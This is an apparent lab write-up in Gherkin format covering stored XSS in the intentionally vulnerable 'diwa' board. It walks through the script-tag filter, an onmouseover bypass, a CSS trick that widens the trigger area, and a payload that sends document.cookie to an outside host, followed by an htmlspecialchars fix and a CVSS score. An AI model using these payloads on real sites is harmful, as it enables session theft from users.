## Version 1.4.1
## language: en

Feature:
  TOE:
    diwa
  Location:
    http://172.17.0.2/?page=thread&id=1
  CWE:
    CWE-79: Improper Neutralization of Input During Web Page
    Generation ('Cross-site Scripting')
  Rule:
    REQ.173: Discard unsafe inputs
  Goal:
    Execute javascript's code in the page
  Recommendation:
    Sanitize inputs

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.07.01  |
    | Brave           | 1.10.97     |
  TOE information:
    Given I am accessing the site at http://172.17.0.2/
    And it runs on a docker container

  Scenario: Normal use case
    Given I have access to the board
    Then I can see, publish and reply posts

  Scenario: Static detection
    When I look at the code at "thread.php"
    Then I can see that in line 17 it only checks for "script" tags
    """
    16  // check if script-tags have been used
    17  if(1 === preg_match('$<script(.*?)>$is', $_POST['post'])) {
    18    $errors[] = 'Script-Tags are not allowed!';
    19  }
    20  else {
    21    // save Post
    22    if (!$model->createPost($_GET['id'], $_SESSION['user_id'],\
          $_POST['post'])) {
    23      $errors[] = 'Your post could not be saved';
    24      } else {
    25        // on success: redirect
    26        redirect('?page=thread&id=' . $_GET['id'] . '&saved=1');
    27      }
    28  }
    """
    Then I can conclude the site its vulnerable to XSS

  Scenario: Dynamic detection
    Given the site is vulnerable to XSS
    But I can not use "<script>"
    Then I try posting:
    """
    <b>Vulnerable to XSS</b>
    """
    And I can see it works [evidence](bold.png)
    Then I can conclude that the site its vulnerable to XSS

  Scenario: Exploitation
    Given that the site its vulnerable to XSS
    But I can not use explicitly "<script>"
    Then I try exploiting Javascript's events
    And I post the message
    """
    <b onmouseover=alert("Vulnerable_to_XSS");>Vulnerable to XSS</b>
    """
    When I go back to see the messages and I hover the mouse over the text
    Then I can see the alert [evidence](alert.png)
    And using CSS I can increase the likelihood of an user triggering the code
    """
    position: absolute;
    background-color:red;
    display:block;
    width: 100%;
    height: 100%
    """
    And the post now looks like [evidence](csspost.png)
    And now the area that would trigger the code looks like [evidence](css.png)
    And if any user hovers the mouse over the red area
    Then the javascript's code will be executed
    And I can even compromise the user's cookie by injecting:
    """
    <b onmouseover=document.location="http://192.168.1.58/?c=".concat(\
    document.cookie)>Vulnerable to XSS</b>
    """
    When the user triggers the code it will be redirected to
    """
    http://192.168.1.58/?c=PHPSESSID=c207a944e487cec01b73aaa56b51cb7f
    """
    Then a malicious PHP code can save the cookie
    And I can conclude that arbitrary javascript's code can be executed

  Scenario: Remediation
    Given I have patched the code by calling htmlspecialchars function
    """
    17  $message = htmlspecialchars($_POST['post']);
    18  // save Post
    19  if (!$model->createPost($_GET['id'], $_SESSION['user_id'], $message)) {
    20    $errors[] = 'Your post could not be saved';
    21  } else {
    22    // on success: redirect
    23    redirect('?page=thread&id=' . $_GET['id'] . '&saved=1');
    24  }
    """
    Then If I try again
    """
    <b>Vulnerable to XSS</b>
    """
    Then I get [evidence](fixed.png)
    And I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.5 (Medium) - AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.2 (Medium) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    4.1 (Medium) - MAV:N/MAC:L/MPR:N/MUI:R/MC:L/MI:N/MA:N

  Scenario: Correlations
    vbd/diwa/0089-index
      Given I exploit the SQLi as in "0089-index"
      Then I can log in as admin
      And I now I have access to the "board" section
